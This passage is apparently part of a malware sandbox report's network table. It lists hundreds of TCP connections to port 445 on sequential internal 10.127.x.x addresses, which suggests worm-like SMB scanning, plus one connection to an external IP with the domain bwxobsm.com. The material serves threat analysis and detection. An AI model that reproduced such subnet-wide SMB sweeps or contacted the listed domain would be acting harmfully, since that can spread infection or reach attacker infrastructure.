| N/A | 10.127.6.122:445 | tcp | |
| N/A | 10.127.6.95:445 | tcp | |
| N/A | 10.127.6.120:445 | tcp | |
| N/A | 10.127.6.93:445 | tcp | |
| N/A | 10.127.6.92:445 | tcp | |
| N/A | 10.127.6.96:445 | tcp | |
| N/A | 10.127.6.110:445 | tcp | |
| N/A | 10.127.6.81:445 | tcp | |
| N/A | 10.127.6.109:445 | tcp | |
| N/A | 10.127.6.82:445 | tcp | |
| N/A | 10.127.6.125:445 | tcp | |
| N/A | 10.127.6.107:445 | tcp | |
| N/A | 10.127.6.114:445 | tcp | |
| N/A | 10.127.6.117:445 | tcp | |
| N/A | 10.127.6.74:445 | tcp | |
| N/A | 10.127.6.87:445 | tcp | |
| N/A | 10.127.6.91:445 | tcp | |
| N/A | 10.127.6.97:445 | tcp | |
| N/A | 10.127.6.105:445 | tcp | |
| N/A | 10.127.6.88:445 | tcp | |
| N/A | 10.127.6.118:445 | tcp | |
| N/A | 10.127.6.76:445 | tcp | |
| N/A | 10.127.6.106:445 | tcp | |
| N/A | 10.127.6.126:445 | tcp | |
| N/A | 10.127.6.112:445 | tcp | |
| N/A | 10.127.6.128:445 | tcp | |
| N/A | 10.127.6.68:445 | tcp | |
| N/A | 10.127.6.80:445 | tcp | |
| N/A | 10.127.6.77:445 | tcp | |
| N/A | 10.127.6.84:445 | tcp | |
| N/A | 10.127.6.85:445 | tcp | |
| N/A | 10.127.6.129:445 | tcp | |
| N/A | 10.127.6.191:445 | tcp | |
| N/A | 10.127.6.142:445 | tcp | |
| N/A | 10.127.6.158:445 | tcp | |
| N/A | 10.127.6.137:445 | tcp | |
| N/A | 10.127.6.164:445 | tcp | |
| N/A | 10.127.6.166:445 | tcp | |
| N/A | 10.127.6.130:445 | tcp | |
| N/A | 10.127.6.140:445 | tcp | |
| N/A | 10.127.6.153:445 | tcp | |
| N/A | 10.127.6.181:445 | tcp | |
| N/A | 10.127.6.160:445 | tcp | |
| N/A | 10.127.6.169:445 | tcp | |
| N/A | 10.127.6.134:445 | tcp | |
| N/A | 10.127.6.143:445 | tcp | |
| N/A | 10.127.6.162:445 | tcp | |
| N/A | 10.127.6.188:445 | tcp | |
| N/A | 10.127.6.156:445 | tcp | |
| N/A | 10.127.6.183:445 | tcp | |
| N/A | 10.127.6.171:445 | tcp | |
| N/A | 10.127.6.151:445 | tcp | |
| N/A | 10.127.6.165:445 | tcp | |
| N/A | 10.127.6.155:445 | tcp | |
| N/A | 10.127.6.190:445 | tcp | |
| N/A | 10.127.6.149:445 | tcp | |
| N/A | 10.127.6.185:445 | tcp | |
| N/A | 10.127.6.135:445 | tcp | |
| N/A | 10.127.6.136:445 | tcp | |
| N/A | 10.127.6.174:445 | tcp | |
| N/A | 10.127.6.186:445 | tcp | |
| N/A | 10.127.6.138:445 | tcp | |
| N/A | 10.127.6.172:445 | tcp | |
| N/A | 10.127.6.139:445 | tcp | |
| N/A | 10.127.6.147:445 | tcp | |
| N/A | 10.127.6.154:445 | tcp | |
| N/A | 10.127.6.141:445 | tcp | |
| N/A | 10.127.6.163:445 | tcp | |
| N/A | 10.127.6.177:445 | tcp | |
| N/A | 10.127.6.168:445 | tcp | |
| N/A | 10.127.6.133:445 | tcp | |
| N/A | 10.127.6.178:445 | tcp | |
| N/A | 10.127.6.148:445 | tcp | |
| N/A | 10.127.6.176:445 | tcp | |
| N/A | 10.127.6.161:445 | tcp | |
| N/A | 10.127.6.131:445 | tcp | |
| N/A | 10.127.6.144:445 | tcp | |
| N/A | 10.127.6.167:445 | tcp | |
| N/A | 10.127.6.146:445 | tcp | |
| N/A | 10.127.6.173:445 | tcp | |
| N/A | 10.127.6.184:445 | tcp | |
| N/A | 10.127.6.189:445 | tcp | |
| N/A | 10.127.6.150:445 | tcp | |
| N/A | 10.127.6.170:445 | tcp | |
| N/A | 10.127.6.132:445 | tcp | |
| N/A | 10.127.6.192:445 | tcp | |
| N/A | 10.127.6.180:445 | tcp | |
| N/A | 10.127.6.145:445 | tcp | |
| N/A | 10.127.6.179:445 | tcp | |
| N/A | 10.127.6.157:445 | tcp | |
| N/A | 10.127.6.175:445 | tcp | |
| N/A | 10.127.6.159:445 | tcp | |
| N/A | 10.127.6.182:445 | tcp | |
| N/A | 10.127.6.187:445 | tcp | |
| N/A | 10.127.6.152:445 | tcp | |
| N/A | 10.127.6.193:445 | tcp | |
| N/A | 10.127.6.210:445 | tcp | |
| N/A | 10.127.6.236:445 | tcp | |
| N/A | 10.127.6.255:445 | tcp | |
| N/A | 10.127.6.232:445 | tcp | |
| N/A | 10.127.6.221:445 | tcp | |
| N/A | 10.127.6.207:445 | tcp | |
| N/A | 10.127.6.213:445 | tcp | |
| N/A | 10.127.6.241:445 | tcp | |
| N/A | 10.127.6.204:445 | tcp | |
| N/A | 10.127.6.195:445 | tcp | |
| N/A | 10.127.6.227:445 | tcp | |
| N/A | 10.127.6.234:445 | tcp | |
| N/A | 10.127.7.0:445 | tcp | |
| N/A | 10.127.6.209:445 | tcp | |
| N/A | 10.127.6.231:445 | tcp | |
| N/A | 10.127.6.250:445 | tcp | |
| N/A | 10.127.6.254:445 | tcp | |
| N/A | 10.127.6.237:445 | tcp | |
| N/A | 10.127.6.205:445 | tcp | |
| N/A | 10.127.6.243:445 | tcp | |
| N/A | 10.127.6.246:445 | tcp | |
| N/A | 10.127.6.218:445 | tcp | |
| N/A | 10.127.6.220:445 | tcp | |
| N/A | 10.127.6.199:445 | tcp | |
| N/A | 10.127.6.201:445 | tcp | |
| N/A | 10.127.6.242:445 | tcp | |
| N/A | 10.127.6.226:445 | tcp | |
| N/A | 10.127.6.235:445 | tcp | |
| N/A | 10.127.6.194:445 | tcp | |
| N/A | 10.127.6.233:445 | tcp | |
| N/A | 10.127.6.203:445 | tcp | |
| N/A | 10.127.6.229:445 | tcp | |
| N/A | 10.127.6.253:445 | tcp | |
| N/A | 10.127.6.212:445 | tcp | |
| N/A | 10.127.6.196:445 | tcp | |
| N/A | 10.127.6.198:445 | tcp | |
| N/A | 10.127.6.217:445 | tcp | |
| N/A | 10.127.6.219:445 | tcp | |
| N/A | 10.127.6.211:445 | tcp | |
| N/A | 10.127.6.228:445 | tcp | |
| N/A | 10.127.6.238:445 | tcp | |
| N/A | 10.127.6.230:445 | tcp | |
| N/A | 10.127.6.208:445 | tcp | |
| N/A | 10.127.6.216:445 | tcp | |
| N/A | 10.127.6.239:445 | tcp | |
| N/A | 10.127.6.197:445 | tcp | |
| N/A | 10.127.6.202:445 | tcp | |
| N/A | 10.127.6.249:445 | tcp | |
| N/A | 10.127.6.248:445 | tcp | |
| N/A | 10.127.6.214:445 | tcp | |
| N/A | 10.127.6.245:445 | tcp | |
| N/A | 10.127.6.240:445 | tcp | |
| N/A | 10.127.6.247:445 | tcp | |
| N/A | 10.127.6.251:445 | tcp | |
| N/A | 10.127.6.252:445 | tcp | |
| N/A | 10.127.6.215:445 | tcp | |
| N/A | 10.127.6.206:445 | tcp | |
| N/A | 10.127.6.223:445 | tcp | |
| N/A | 10.127.6.224:445 | tcp | |
| N/A | 10.127.6.222:445 | tcp | |
| N/A | 10.127.6.200:445 | tcp | |
| N/A | 10.127.6.225:445 | tcp | |
| N/A | 10.127.6.244:445 | tcp | |
| N/A | 10.127.7.1:445 | tcp | |
| N/A | 10.127.7.38:445 | tcp | |
| N/A | 10.127.7.14:445 | tcp | |
| N/A | 10.127.7.23:445 | tcp | |
| N/A | 10.127.7.22:445 | tcp | |
| N/A | 10.127.7.53:445 | tcp | |
| N/A | 10.127.7.27:445 | tcp | |
| N/A | 10.127.7.41:445 | tcp | |
| N/A | 10.127.7.3:445 | tcp | |
| N/A | 10.127.7.42:445 | tcp | |
| N/A | 10.127.7.5:445 | tcp | |
| N/A | 10.127.7.11:445 | tcp | |
| N/A | 10.127.7.43:445 | tcp | |
| N/A | 10.127.7.59:445 | tcp | |
| N/A | 10.127.7.49:445 | tcp | |
| N/A | 10.127.7.62:445 | tcp | |
| N/A | 10.127.7.2:445 | tcp | |
| N/A | 10.127.7.15:445 | tcp | |
| N/A | 10.127.7.63:445 | tcp | |
| N/A | 10.127.7.34:445 | tcp | |
| N/A | 10.127.7.44:445 | tcp | |
| N/A | 10.127.7.31:445 | tcp | |
| N/A | 10.127.7.7:445 | tcp | |
| N/A | 10.127.7.64:445 | tcp | |
| N/A | 10.127.7.9:445 | tcp | |
| N/A | 10.127.7.13:445 | tcp | |
| N/A | 10.127.7.39:445 | tcp | |
| N/A | 10.127.7.4:445 | tcp | |
| N/A | 10.127.7.52:445 | tcp | |
| N/A | 10.127.7.10:445 | tcp | |
| N/A | 10.127.7.57:445 | tcp | |
| N/A | 10.127.7.28:445 | tcp | |
| N/A | 10.127.7.8:445 | tcp | |
| N/A | 10.127.7.17:445 | tcp | |
| N/A | 10.127.7.12:445 | tcp | |
| N/A | 10.127.7.56:445 | tcp | |
| N/A | 10.127.7.24:445 | tcp | |
| N/A | 10.127.7.32:445 | tcp | |
| N/A | 10.127.7.33:445 | tcp | |
| N/A | 10.127.7.61:445 | tcp | |
| N/A | 10.127.7.29:445 | tcp | |
| N/A | 10.127.7.46:445 | tcp | |
| N/A | 10.127.7.6:445 | tcp | |
| N/A | 10.127.7.16:445 | tcp | |
| N/A | 10.127.7.37:445 | tcp | |
| N/A | 10.127.7.48:445 | tcp | |
| N/A | 10.127.7.50:445 | tcp | |
| N/A | 10.127.7.60:445 | tcp | |
| N/A | 10.127.7.45:445 | tcp | |
| N/A | 10.127.7.58:445 | tcp | |
| N/A | 10.127.7.25:445 | tcp | |
| N/A | 10.127.7.20:445 | tcp | |
| N/A | 10.127.7.19:445 | tcp | |
| N/A | 10.127.7.36:445 | tcp | |
| N/A | 10.127.7.54:445 | tcp | |
| N/A | 10.127.7.21:445 | tcp | |
| N/A | 10.127.7.55:445 | tcp | |
| N/A | 10.127.7.30:445 | tcp | |
| N/A | 10.127.7.35:445 | tcp | |
| N/A | 10.127.7.40:445 | tcp | |
| N/A | 10.127.7.47:445 | tcp | |
| N/A | 10.127.7.18:445 | tcp | |
| N/A | 10.127.7.26:445 | tcp | |
| N/A | 10.127.7.51:445 | tcp | |
| N/A | 10.127.7.65:445 | tcp | |
| N/A | 10.127.7.66:445 | tcp | |
| N/A | 10.127.7.99:445 | tcp | |
| N/A | 10.127.7.114:445 | tcp | |
| N/A | 10.127.7.70:445 | tcp | |
| N/A | 10.127.7.89:445 | tcp | |
| N/A | 10.127.7.92:445 | tcp | |
| N/A | 10.127.7.112:445 | tcp | |
| N/A | 10.127.7.75:445 | tcp | |
| N/A | 10.127.7.83:445 | tcp | |
| N/A | 10.127.7.82:445 | tcp | |
| N/A | 10.127.7.116:445 | tcp | |
| N/A | 10.127.7.115:445 | tcp | |
| N/A | 10.127.7.109:445 | tcp | |
| N/A | 10.127.7.74:445 | tcp | |
| N/A | 10.127.7.67:445 | tcp | |
| N/A | 10.127.7.81:445 | tcp | |
| N/A | 10.127.7.121:445 | tcp | |
| N/A | 10.127.7.123:445 | tcp | |
| N/A | 10.127.7.73:445 | tcp | |
| N/A | 10.127.7.104:445 | tcp | |
| N/A | 10.127.7.127:445 | tcp | |
| N/A | 10.127.7.69:445 | tcp | |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| N/A | 10.127.7.128:445 | tcp | |
| N/A | 10.127.7.102:445 | tcp | |
| N/A | 10.127.7.106:445 | tcp | |
| N/A | 10.127.7.85:445 | tcp | |
| N/A | 10.127.7.86:445 | tcp | |
| N/A | 10.127.7.107:445 | tcp | |
| N/A | 10.127.7.96:445 | tcp | |
| N/A | 10.127.7.117:445 | tcp | |
| N/A | 10.127.7.124:445 | tcp | |
| N/A | 10.127.7.98:445 | tcp | |
| N/A | 10.127.7.122:445 | tcp | |
| N/A | 10.127.7.77:445 | tcp | |
| N/A | 10.127.7.80:445 | tcp | |
| N/A | 10.127.7.84:445 | tcp | |
| N/A | 10.127.7.103:445 | tcp | |
| N/A | 10.127.7.108:445 | tcp | |
| N/A | 10.127.7.126:445 | tcp | |
| N/A | 10.127.7.120:445 | tcp | |
| N/A | 10.127.7.95:445 | tcp | |
| N/A | 10.127.7.72:445 | tcp | |
| N/A | 10.127.7.78:445 | tcp | |
| N/A | 10.127.7.87:445 | tcp | |
| N/A | 10.127.7.88:445 | tcp | |
| N/A | 10.127.7.90:445 | tcp | |
| N/A | 10.127.7.97:445 | tcp | |
| N/A | 10.127.7.93:445 | tcp | |
| N/A | 10.127.7.68:445 | tcp | |
| N/A | 10.127.7.79:445 | tcp | |
| N/A | 10.127.7.111:445 | tcp | |
| N/A | 10.127.7.118:445 | tcp | |
| N/A | 10.127.7.119:445 | tcp | |
| N/A | 10.127.7.76:445 | tcp | |
| N/A | 10.127.7.110:445 | tcp | |
| N/A | 10.127.7.113:445 | tcp | |
| N/A | 10.127.7.100:445 | tcp | |
| N/A | 10.127.7.105:445 | tcp | |
| N/A | 10.127.7.71:445 | tcp | |
| N/A | 10.127.7.91:445 | tcp | |
| N/A | 10.127.7.94:445 | tcp | |
| N/A | 10.127.7.101:445 | tcp | |
| N/A | 10.127.7.125:445 | tcp | |
| N/A | 10.127.7.129:445 | tcp | |
| N/A | 10.127.7.174:445 | tcp | |
| N/A | 10.127.7.172:445 | tcp | |
| N/A | 10.127.7.175:445 | tcp | |
| N/A | 10.127.7.186:445 | tcp | |
| N/A | 10.127.7.139:445 | tcp | |
| N/A | 10.127.7.164:445 | tcp | |
| N/A | 10.127.7.185:445 | tcp | |
| N/A | 10.127.7.130:445 | tcp | |
| N/A | 10.127.7.178:445 | tcp | |
| N/A | 10.127.7.137:445 | tcp | |
| N/A | 10.127.7.154:445 | tcp | |
| N/A | 10.127.7.156:445 | tcp | |
| N/A | 10.127.7.176:445 | tcp | |
| N/A | 10.127.7.182:445 | tcp | |
| N/A | 10.127.7.142:445 | tcp | |
| N/A | 10.127.7.177:445 | tcp | |
| N/A | 10.127.7.143:445 | tcp | |
| N/A | 10.127.7.145:445 | tcp | |
| N/A | 10.127.7.135:445 | tcp | |
| N/A | 10.127.7.169:445 | tcp | |
| N/A | 10.127.7.157:445 | tcp | |
| N/A | 10.127.7.161:445 | tcp | |
| N/A | 10.127.7.168:445 | tcp | |
| N/A | 10.127.7.163:445 | tcp | |
| N/A | 10.127.7.192:445 | tcp | |
| N/A | 10.127.7.153:445 | tcp | |
| N/A | 10.127.7.183:445 | tcp | |
| N/A | 10.127.7.159:445 | tcp | |
| N/A | 10.127.7.173:445 | tcp | |
| N/A | 10.127.7.155:445 | tcp | |
| N/A | 10.127.7.165:445 | tcp | |
| N/A | 10.127.7.149:445 | tcp | |
| N/A | 10.127.7.179:445 | tcp | |
| N/A | 10.127.7.188:445 | tcp | |
| N/A | 10.127.7.170:445 | tcp | |
| N/A | 10.127.7.171:445 | tcp | |
| N/A | 10.127.7.162:445 | tcp | |
| N/A | 10.127.7.160:445 | tcp | |
| N/A | 10.127.7.132:445 | tcp | |
| N/A | 10.127.7.151:445 | tcp | |
| N/A | 10.127.7.136:445 | tcp | |
| N/A | 10.127.7.150:445 | tcp | |
| N/A | 10.127.7.147:445 | tcp | |
| N/A | 10.127.7.190:445 | tcp | |
| N/A | 10.127.7.144:445 | tcp | |
| N/A | 10.127.7.184:445 | tcp | |
| N/A | 10.127.7.138:445 | tcp | |
| N/A | 10.127.7.167:445 | tcp | |
| N/A | 10.127.7.191:445 | tcp | |
| N/A | 10.127.7.181:445 | tcp | |
| N/A | 10.127.7.134:445 | tcp | |
| N/A | 10.127.7.148:445 | tcp | |
| N/A | 10.127.7.141:445 | tcp | |
| N/A | 10.127.7.158:445 | tcp | |
| N/A | 10.127.7.187:445 | tcp | |
| N/A | 10.127.7.133:445 | tcp | |
| N/A | 10.127.7.180:445 | tcp | |
| N/A | 10.127.7.146:445 | tcp | |
| N/A | 10.127.7.166:445 | tcp | |
| N/A | 10.127.7.189:445 | tcp | |
| N/A | 10.127.7.152:445 | tcp | |
| N/A | 10.127.7.131:445 | tcp | |
| N/A | 10.127.7.140:445 | tcp | |
| N/A | 10.127.7.193:445 | tcp | |
| N/A | 10.127.7.201:445 | tcp | |
| N/A | 10.127.7.242:445 | tcp | |
| N/A | 10.127.7.196:445 | tcp | |
| N/A | 10.127.7.223:445 | tcp | |
| N/A | 10.127.7.235:445 | tcp | |
| N/A | 10.127.7.205:445 | tcp | |
| N/A | 10.127.7.197:445 | tcp | |
| N/A | 10.127.7.221:445 | tcp | |
| N/A | 10.127.7.240:445 | tcp | |
| N/A | 10.127.7.228:445 | tcp | |
| N/A | 10.127.7.236:445 | tcp | |
| N/A | 10.127.7.200:445 | tcp | |
| N/A | 10.127.7.204:445 | tcp | |
| N/A | 10.127.7.213:445 | tcp | |
| N/A | 10.127.7.195:445 | tcp | |
| N/A | 10.127.7.254:445 | tcp | |
| N/A | 10.127.7.222:445 | tcp | |
| N/A | 10.127.7.210:445 | tcp | |
| N/A | 10.127.7.237:445 | tcp | |
| N/A | 10.127.7.234:445 | tcp | |
| N/A | 10.127.7.206:445 | tcp | |
| N/A | 10.127.7.239:445 | tcp | |
| N/A | 10.127.7.199:445 | tcp | |
| N/A | 10.127.7.230:445 | tcp | |
| N/A | 10.127.7.220:445 | tcp | |
| N/A | 10.127.7.215:445 | tcp | |
| N/A | 10.127.7.219:445 | tcp | |
| N/A | 10.127.7.255:445 | tcp | |
| N/A | 10.127.7.231:445 | tcp | |
| N/A | 10.127.7.238:445 | tcp | |
| N/A | 10.127.7.248:445 | tcp | |
| N/A | 10.127.7.252:445 | tcp | |
| N/A | 10.127.7.247:445 | tcp | |
| N/A | 10.127.7.212:445 | tcp | |
| N/A | 10.127.7.194:445 | tcp | |
| N/A | 10.127.7.202:445 | tcp | |
| N/A | 10.127.7.241:445 | tcp | |
| N/A | 10.127.7.214:445 | tcp | |
| N/A | 10.127.7.250:445 | tcp | |
| N/A | 10.127.7.253:445 | tcp | |
| N/A | 10.127.7.245:445 | tcp | |
| N/A | 10.127.7.208:445 | tcp | |
| N/A | 10.127.7.227:445 | tcp | |
| N/A | 10.127.7.229:445 | tcp | |
| N/A | 10.127.7.225:445 | tcp | |
| N/A | 10.127.7.203:445 | tcp | |
| N/A | 10.127.7.233:445 | tcp | |
| N/A | 10.127.7.244:445 | tcp | |
| N/A | 10.127.7.198:445 | tcp | |
| N/A | 10.127.7.216:445 | tcp | |
| N/A | 10.127.7.243:445 | tcp | |
| N/A | 10.127.8.0:445 | tcp | |
| N/A | 10.127.7.224:445 | tcp | |
| N/A | 10.127.7.226:445 | tcp | |
| N/A | 10.127.7.211:445 | tcp | |
| N/A | 10.127.7.246:445 | tcp | |
| N/A | 10.127.7.209:445 | tcp | |
| N/A | 10.127.7.251:445 | tcp | |
| N/A | 10.127.7.249:445 | tcp | |
| N/A | 10.127.7.232:445 | tcp | |
| N/A | 10.127.7.217:445 | tcp | |
| N/A | 10.127.7.207:445 | tcp | |
| N/A | 10.127.7.218:445 | tcp | |
| N/A | 10.127.8.1:445 | tcp | |
| N/A | 10.127.8.30:445 | tcp | |
| N/A | 10.127.8.39:445 | tcp | |
| N/A | 10.127.8.54:445 | tcp | |
| N/A | 10.127.8.23:445 | tcp | |
| N/A | 10.127.8.42:445 | tcp | |
| N/A | 10.127.8.48:445 | tcp | |
| N/A | 10.127.8.55:445 | tcp | |
| N/A | 10.127.8.64:445 | tcp | |
| N/A | 10.127.8.22:445 | tcp | |
| N/A | 10.127.8.32:445 | tcp | |
| N/A | 10.127.8.2:445 | tcp | |
| N/A | 10.127.8.43:445 | tcp | |
| N/A | 10.127.8.61:445 | tcp | |
| N/A | 10.127.8.12:445 | tcp | |
| N/A | 10.127.8.20:445 | tcp | |
| N/A | 10.127.8.19:445 | tcp | |
| N/A | 10.127.8.34:445 | tcp | |
| N/A | 10.127.8.28:445 | tcp | |
| N/A | 10.127.8.46:445 | tcp | |
| N/A | 10.127.8.49:445 | tcp | |
| N/A | 10.127.8.15:445 | tcp | |
| N/A | 10.127.8.26:445 | tcp | |
| N/A | 10.127.8.10:445 | tcp | |
| N/A | 10.127.8.59:445 | tcp | |
| N/A | 10.127.8.7:445 | tcp | |
| N/A | 10.127.8.14:445 | tcp | |
| N/A | 10.127.8.63:445 | tcp | |
| N/A | 10.127.8.60:445 | tcp | |
| N/A | 10.127.8.3:445 | tcp | |
| N/A | 10.127.8.29:445 | tcp | |
| N/A | 10.127.8.56:445 | tcp | |
| N/A | 10.127.8.6:445 | tcp | |
| N/A | 10.127.8.51:445 | tcp | |
| N/A | 10.127.8.57:445 | tcp | |
| N/A | 10.127.8.8:445 | tcp | |
| N/A | 10.127.8.21:445 | tcp | |
| N/A | 10.127.8.38:445 | tcp | |
| N/A | 10.127.8.33:445 | tcp | |
| N/A | 10.127.8.35:445 | tcp | |
| N/A | 10.127.8.16:445 | tcp | |
| N/A | 10.127.8.25:445 | tcp | |
| N/A | 10.127.8.40:445 | tcp | |
| N/A | 10.127.8.11:445 | tcp | |
| N/A | 10.127.8.45:445 | tcp | |
| N/A | 10.127.8.41:445 | tcp | |
| N/A | 10.127.8.27:445 | tcp | |
| N/A | 10.127.8.53:445 | tcp | |
| N/A | 10.127.8.31:445 | tcp | |
| N/A | 10.127.8.36:445 | tcp | |
| N/A | 10.127.8.52:445 | tcp | |
| N/A | 10.127.8.44:445 | tcp | |
| N/A | 10.127.8.62:445 | tcp | |
| N/A | 10.127.8.58:445 | tcp | |
| N/A | 10.127.8.13:445 | tcp | |
| N/A | 10.127.8.17:445 | tcp | |
| N/A | 10.127.8.24:445 | tcp | |
| N/A | 10.127.8.47:445 | tcp | |
| N/A | 10.127.8.5:445 | tcp | |
| N/A | 10.127.8.37:445 | tcp | |
| N/A | 10.127.8.4:445 | tcp | |
| N/A | 10.127.8.9:445 | tcp | |
| N/A | 10.127.8.18:445 | tcp | |
| N/A | 10.127.8.50:445 | tcp | |
| N/A | 10.127.8.65:445 | tcp | |
| N/A | 10.127.8.66:445 | tcp | |
| N/A | 10.127.8.127:445 | tcp | |
| N/A | 10.127.8.74:445 | tcp | |
| N/A | 10.127.8.120:445 | tcp | |
| N/A | 10.127.8.103:445 | tcp | |
| N/A | 10.127.8.97:445 | tcp | |
| N/A | 10.127.8.106:445 | tcp | |
| N/A | 10.127.8.110:445 | tcp | |
| N/A | 10.127.8.123:445 | tcp | |
| N/A | 10.127.8.100:445 | tcp | |
| N/A | 10.127.8.67:445 | tcp | |
| N/A | 10.127.8.105:445 | tcp | |
| N/A | 10.127.8.119:445 | tcp | |
| N/A | 10.127.8.126:445 | tcp | |
| N/A | 10.127.8.76:445 | tcp | |
| N/A | 10.127.8.122:445 | tcp | |
| N/A | 10.127.8.69:445 | tcp | |
| N/A | 10.127.8.83:445 | tcp | |
| N/A | 10.127.8.85:445 | tcp | |
| N/A | 10.127.8.81:445 | tcp | |
| N/A | 10.127.8.101:445 | tcp | |
| N/A | 10.127.8.107:445 | tcp | |
| N/A | 10.127.8.108:445 | tcp | |
| N/A | 10.127.8.121:445 | tcp | |
| N/A | 10.127.8.94:445 | tcp | |
| N/A | 10.127.8.98:445 | tcp | |
| N/A | 10.127.8.115:445 | tcp | |
| N/A | 10.127.8.112:445 | tcp | |
| N/A | 10.127.8.113:445 | tcp | |
| N/A | 10.127.8.78:445 | tcp | |
| N/A | 10.127.8.104:445 | tcp | |
| N/A | 10.127.8.93:445 | tcp | |
| N/A | 10.127.8.102:445 | tcp | |
| N/A | 10.127.8.91:445 | tcp | |
| N/A | 10.127.8.114:445 | tcp | |
| N/A | 10.127.8.111:445 | tcp | |
| N/A | 10.127.8.79:445 | tcp | |
| N/A | 10.127.8.86:445 | tcp | |
| N/A | 10.127.8.117:445 | tcp | |
| N/A | 10.127.8.125:445 | tcp | |
| N/A | 10.127.8.84:445 | tcp | |
| N/A | 10.127.8.90:445 | tcp | |
| N/A | 10.127.8.95:445 | tcp | |
| N/A | 10.127.8.77:445 | tcp | |
| N/A | 10.127.8.82:445 | tcp | |
| N/A | 10.127.8.73:445 | tcp | |
| N/A | 10.127.8.68:445 | tcp | |
| N/A | 10.127.8.118:445 | tcp | |
| N/A | 10.127.8.87:445 | tcp | |
| N/A | 10.127.8.89:445 | tcp | |
| N/A | 10.127.8.70:445 | tcp | |
| N/A | 10.127.8.72:445 | tcp | |
| N/A | 10.127.8.99:445 | tcp | |
| N/A | 10.127.8.116:445 | tcp | |
| N/A | 10.127.8.96:445 | tcp | |
| N/A | 10.127.8.80:445 | tcp | |
| N/A | 10.127.8.109:445 | tcp | |
| N/A | 10.127.8.75:445 | tcp | |
| N/A | 10.127.8.128:445 | tcp | |
| N/A | 10.127.8.71:445 | tcp | |
| N/A | 10.127.8.88:445 | tcp | |
| N/A | 10.127.8.92:445 | tcp | |
| N/A | 10.127.8.124:445 | tcp | |
| N/A | 10.127.8.129:445 | tcp | |
| N/A | 10.127.8.130:445 | tcp | |
| N/A | 10.127.8.145:445 | tcp | |
| N/A | 10.127.8.159:445 | tcp | |
| N/A | 10.127.8.175:445 | tcp | |
| N/A | 10.127.8.143:445 | tcp | |
| N/A | 10.127.8.168:445 | tcp | |
| N/A | 10.127.8.173:445 | tcp | |
| N/A | 10.127.8.131:445 | tcp | |
| N/A | 10.127.8.144:445 | tcp | |
| N/A | 10.127.8.169:445 | tcp | |
| N/A | 10.127.8.174:445 | tcp | |
| N/A | 10.127.8.180:445 | tcp | |
| N/A | 10.127.8.139:445 | tcp | |
| N/A | 10.127.8.172:445 | tcp | |
| N/A | 10.127.8.151:445 | tcp | |
| N/A | 10.127.8.157:445 | tcp | |
| N/A | 10.127.8.136:445 | tcp | |
| N/A | 10.127.8.162:445 | tcp | |
| N/A | 10.127.8.184:445 | tcp | |
| N/A | 10.127.8.179:445 | tcp | |
| N/A | 10.127.8.133:445 | tcp | |
| N/A | 10.127.8.146:445 | tcp | |
| N/A | 10.127.8.186:445 | tcp | |
| N/A | 10.127.8.141:445 | tcp | |
| N/A | 10.127.8.178:445 | tcp | |
| N/A | 10.127.8.176:445 | tcp | |
| N/A | 10.127.8.138:445 | tcp | |
| N/A | 10.127.8.149:445 | tcp | |
| N/A | 10.127.8.171:445 | tcp | |
| N/A | 10.127.8.135:445 | tcp | |
| N/A | 10.127.8.185:445 | tcp | |
| N/A | 10.127.8.182:445 | tcp | |
| N/A | 10.127.8.189:445 | tcp | |
| N/A | 10.127.8.161:445 | tcp | |
| N/A | 10.127.8.142:445 | tcp | |
| N/A | 10.127.8.140:445 | tcp | |
| N/A | 10.127.8.155:445 | tcp | |
| N/A | 10.127.8.160:445 | tcp | |
| N/A | 10.127.8.177:445 | tcp | |
| N/A | 10.127.8.134:445 | tcp | |
| N/A | 10.127.8.154:445 | tcp | |
| N/A | 10.127.8.191:445 | tcp | |
| N/A | 10.127.8.164:445 | tcp | |
| N/A | 10.127.8.153:445 | tcp | |
| N/A | 10.127.8.156:445 | tcp | |
| N/A | 10.127.8.147:445 | tcp | |
| N/A | 10.127.8.187:445 | tcp | |
| N/A | 10.127.8.188:445 | tcp | |
| N/A | 10.127.8.192:445 | tcp | |
| N/A | 10.127.8.132:445 | tcp | |
| N/A | 10.127.8.158:445 | tcp | |
| N/A | 10.127.8.163:445 | tcp | |
| N/A | 10.127.8.181:445 | tcp | |
| N/A | 10.127.8.165:445 | tcp | |
| N/A | 10.127.8.148:445 | tcp | |
| N/A | 10.127.8.152:445 | tcp | |
| N/A | 10.127.8.150:445 | tcp | |
| N/A | 10.127.8.166:445 | tcp | |
| N/A | 10.127.8.167:445 | tcp | |
| N/A | 10.127.8.170:445 | tcp | |
| N/A | 10.127.8.137:445 | tcp | |
| N/A | 10.127.8.183:445 | tcp | |
| N/A | 10.127.8.190:445 | tcp | |
| N/A | 10.127.8.193:445 | tcp | |
| N/A | 10.127.8.208:445 | tcp | |
| N/A | 10.127.8.255:445 | tcp | |
| N/A | 10.127.8.225:445 | tcp | |
| N/A | 10.127.8.251:445 | tcp | |
| N/A | 10.127.8.206:445 | tcp | |
| N/A | 10.127.8.199:445 | tcp | |
| N/A | 10.127.8.248:445 | tcp | |
| N/A | 10.127.8.253:445 | tcp | |
| N/A | 10.127.8.210:445 | tcp | |
| N/A | 10.127.8.214:445 | tcp | |
| N/A | 10.127.8.245:445 | tcp | |
| N/A | 10.127.8.220:445 | tcp | |
| N/A | 10.127.8.202:445 | tcp | |
| N/A | 10.127.8.223:445 | tcp | |
| N/A | 10.127.8.242:445 | tcp | |
| N/A | 10.127.8.229:445 | tcp | |
| N/A | 10.127.8.212:445 | tcp | |
| N/A | 10.127.8.232:445 | tcp | |
| N/A | 10.127.8.244:445 | tcp | |
| N/A | 10.127.8.203:445 | tcp | |
| N/A | 10.127.8.209:445 | tcp | |
| N/A | 10.127.8.224:445 | tcp | |
| N/A | 10.127.8.254:445 | tcp | |
| N/A | 10.127.8.250:445 | tcp | |
| N/A | 10.127.8.234:445 | tcp | |
| N/A | 10.127.8.215:445 | tcp | |
| N/A | 10.127.8.240:445 | tcp | |
| N/A | 10.127.8.228:445 | tcp | |
| N/A | 10.127.8.230:445 | tcp | |
| N/A | 10.127.8.195:445 | tcp | |
| N/A | 10.127.8.243:445 | tcp | |
| N/A | 10.127.8.231:445 | tcp | |
| N/A | 10.127.8.246:445 | tcp | |
| N/A | 10.127.8.249:445 | tcp | |
| N/A | 10.127.8.200:445 | tcp | |
| N/A | 10.127.8.239:445 | tcp | |
| N/A | 10.127.8.218:445 | tcp | |
| N/A | 10.127.8.217:445 | tcp | |
| N/A | 10.127.8.205:445 | tcp | |
| N/A | 10.127.8.213:445 | tcp | |
| N/A | 10.127.8.196:445 | tcp | |
| N/A | 10.127.8.222:445 | tcp | |
